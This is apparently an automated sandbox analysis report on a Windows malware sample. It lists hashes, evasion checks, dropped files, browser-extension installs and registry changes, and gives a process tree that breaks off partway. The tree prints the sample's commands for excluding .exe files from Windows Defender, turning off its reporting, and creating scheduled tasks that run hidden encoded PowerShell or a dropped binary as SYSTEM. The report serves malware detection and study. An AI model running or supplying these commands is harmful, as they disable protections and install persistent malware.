Analysis
-
max time kernel
145s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2023 10:15
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231020-en
General
-
Target
file.exe
-
Size
7.1MB
-
MD5
148ac3c1dd4761fb48f2c92be04ece34
-
SHA1
462c861101813339b423b3db9575d2c692ec758d
-
SHA256
44d099fe20a392c3e647a6a589f20923cb7937931c6ff379828661e129110979
-
SHA512
5ef132edb43bdba2b634a2d914e59be47941b3644cdbf8bc8e271d95b851208b7da4c49defafe3b30550e9489a172ebfaf77b5af1900ed993f40010bc34c6108
-
SSDEEP
196608:91O1TzDtD7vGjEjmlZ7NSTcaUI/8Rxa8NIKC3K4kIKld:3OPD7vMPlRPa/URj+KQKxld
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 104 1224 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation mBkgFeJ.exe -
Executes dropped EXE 4 IoCs
pid Process 1728 Install.exe 2264 Install.exe 4548 SutopBA.exe 1040 mBkgFeJ.exe -
Loads dropped DLL 1 IoCs
pid Process 1224 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json mBkgFeJ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json mBkgFeJ.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini mBkgFeJ.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 mBkgFeJ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mBkgFeJ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 mBkgFeJ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 mBkgFeJ.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini SutopBA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol SutopBA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 mBkgFeJ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B mBkgFeJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content mBkgFeJ.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak mBkgFeJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja mBkgFeJ.exe File created C:\Program Files (x86)\nLtdqPxSU\WHLqPtA.xml mBkgFeJ.exe File created C:\Program Files (x86)\VruDcINppTZNIqemGVR\TrhMPmU.dll mBkgFeJ.exe File created C:\Program Files (x86)\kTkhuvRgNyZU2\PKajUvkOMWfAa.dll mBkgFeJ.exe File created C:\Program Files (x86)\VruDcINppTZNIqemGVR\QAreWTu.xml mBkgFeJ.exe File created C:\Program Files (x86)\NWoXnskKXdJGC\HbREogr.xml mBkgFeJ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi mBkgFeJ.exe File created C:\Program Files (x86)\qnfVUcymejUn\oTPpcWe.dll mBkgFeJ.exe File created C:\Program Files (x86)\NWoXnskKXdJGC\DZjBpRI.dll mBkgFeJ.exe File created C:\Program Files (x86)\nLtdqPxSU\KjvOWA.dll mBkgFeJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi mBkgFeJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak mBkgFeJ.exe File created C:\Program Files (x86)\kTkhuvRgNyZU2\DiUWwka.xml mBkgFeJ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bfQCIeAfoMUjiMvHpK.job schtasks.exe File created C:\Windows\Tasks\PYxBkvPuMRnFgrady.job schtasks.exe File created C:\Windows\Tasks\puEiLMJPChlWPyy.job schtasks.exe File created C:\Windows\Tasks\UlrsxbhsbQOtZaLyo.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3124 schtasks.exe 4088 schtasks.exe 1224 schtasks.exe 1840 schtasks.exe 2000 schtasks.exe 5000 schtasks.exe 2864 schtasks.exe 4084 schtasks.exe 636 schtasks.exe 2448 schtasks.exe 3660 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket mBkgFeJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" mBkgFeJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix mBkgFeJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{66c809e9-0000-0000-0000-d01200000000} mBkgFeJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" mBkgFeJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume mBkgFeJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" mBkgFeJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" mBkgFeJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" mBkgFeJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer mBkgFeJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" mBkgFeJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 2648 powershell.EXE 2648 powershell.EXE 2648 powershell.EXE 5036 powershell.exe 5036 powershell.exe 5036 powershell.exe 4952 powershell.exe 4952 powershell.exe 4952 powershell.exe 964 powershell.EXE 964 powershell.EXE 964 powershell.EXE 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe 1040 mBkgFeJ.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2648 powershell.EXE Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeDebugPrivilege 964 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3888 wrote to memory of 1728 3888 file.exe 87 PID 3888 wrote to memory of 1728 3888 file.exe 87 PID 3888 wrote to memory of 1728 3888 file.exe 87 PID 1728 wrote to memory of 2264 1728 Install.exe 90 PID 1728 wrote to memory of 2264 1728 Install.exe 90 PID 1728 wrote to memory of 2264 1728 Install.exe 90 PID 2264 wrote to memory of 4736 2264 Install.exe 96 PID 2264 wrote to memory of 4736 2264 Install.exe 96 PID 2264 wrote to memory of 4736 2264 Install.exe 96 PID 2264 wrote to memory of 1716 2264 Install.exe 98 PID 2264 wrote to memory of 1716 2264 Install.exe 98 PID 2264 wrote to memory of 1716 2264 Install.exe 98 PID 4736 wrote to memory of 1848 4736 forfiles.exe 100 PID 4736 wrote to memory of 1848 4736 forfiles.exe 100 PID 4736 wrote to memory of 1848 4736 forfiles.exe 100 PID 1716 wrote to memory of 2956 1716 forfiles.exe 101 PID 1716 wrote to memory of 2956 1716 forfiles.exe 101 PID 1716 wrote to memory of 2956 1716 forfiles.exe 101 PID 1848 wrote to memory of 4500 1848 cmd.exe 102 PID 1848 wrote to memory of 4500 1848 cmd.exe 102 PID 1848 wrote to memory of 4500 1848 cmd.exe 102 PID 1848 wrote to memory of 3060 1848 cmd.exe 104 PID 1848 wrote to memory of 3060 1848 cmd.exe 104 PID 1848 wrote to memory of 3060 1848 cmd.exe 104 PID 2956 wrote to memory of 4416 2956 cmd.exe 103 PID 2956 wrote to memory of 4416 2956 cmd.exe 103 PID 2956 wrote to memory of 4416 2956 cmd.exe 103 PID 2956 wrote to memory of 3648 2956 cmd.exe 105 PID 2956 wrote to memory of 3648 2956 cmd.exe 105 PID 2956 wrote to memory of 3648 2956 cmd.exe 105 PID 2264 wrote to memory of 2448 2264 Install.exe 108 PID 2264 wrote to memory of 2448 2264 Install.exe 108 PID 2264 wrote to memory of 2448 2264 Install.exe 108 PID 2264 wrote to memory of 5052 2264 Install.exe 110 PID 2264 wrote to memory of 5052 2264 Install.exe 110 PID 2264 wrote to memory of 5052 2264 Install.exe 110 PID 2648 wrote to memory of 1788 2648 powershell.EXE 114 PID 2648 wrote to memory of 1788 2648 powershell.EXE 114 PID 2264 wrote to memory of 3124 2264 Install.exe 121 PID 2264 wrote to memory of 3124 2264 Install.exe 121 PID 2264 wrote to memory of 3124 2264 Install.exe 121 PID 2264 wrote to memory of 3660 2264 Install.exe 124 PID 2264 wrote to memory of 3660 2264 Install.exe 124 PID 2264 wrote to memory of 3660 2264 Install.exe 124 PID 4548 wrote to memory of 5036 4548 SutopBA.exe 134 PID 4548 wrote to memory of 5036 4548 SutopBA.exe 134 PID 4548 wrote to memory of 5036 4548 SutopBA.exe 134 PID 5036 wrote to memory of 1596 5036 powershell.exe 136 PID 5036 wrote to memory of 1596 5036 powershell.exe 136 PID 5036 wrote to memory of 1596 5036 powershell.exe 136 PID 1596 wrote to memory of 3504 1596 cmd.exe 137 PID 1596 wrote to memory of 3504 1596 cmd.exe 137 PID 1596 wrote to memory of 3504 1596 cmd.exe 137 PID 5036 wrote to memory of 768 5036 powershell.exe 138 PID 5036 wrote to memory of 768 5036 powershell.exe 138 PID 5036 wrote to memory of 768 5036 powershell.exe 138 PID 5036 wrote to memory of 992 5036 powershell.exe 139 PID 5036 wrote to memory of 992 5036 powershell.exe 139 PID 5036 wrote to memory of 992 5036 powershell.exe 139 PID 5036 wrote to memory of 4144 5036 powershell.exe 140 PID 5036 wrote to memory of 4144 5036 powershell.exe 140 PID 5036 wrote to memory of 4144 5036 powershell.exe 140 PID 5036 wrote to memory of 3836 5036 powershell.exe 141 PID 5036 wrote to memory of 3836 5036 powershell.exe 141
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Users\Admin\AppData\Local\Temp\7zS86A5.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\7zS88C7.tmp\Install.exe.\Install.exe /TdidFGK "525403" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4500
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3060
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4416
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:3648
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdrwkBfOJ" /SC once /ST 06:42:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdrwkBfOJ"4⤵PID:5052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdrwkBfOJ"4⤵PID:3124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bfQCIeAfoMUjiMvHpK" /SC once /ST 10:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\zkYnJmYRuJHCWjs\SutopBA.exe\" Xd /MVsite_idwTO 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3660
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1788
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4408
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1604
-
C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\zkYnJmYRuJHCWjs\SutopBA.exeC:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\zkYnJmYRuJHCWjs\SutopBA.exe Xd /MVsite_idwTO 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4548 -
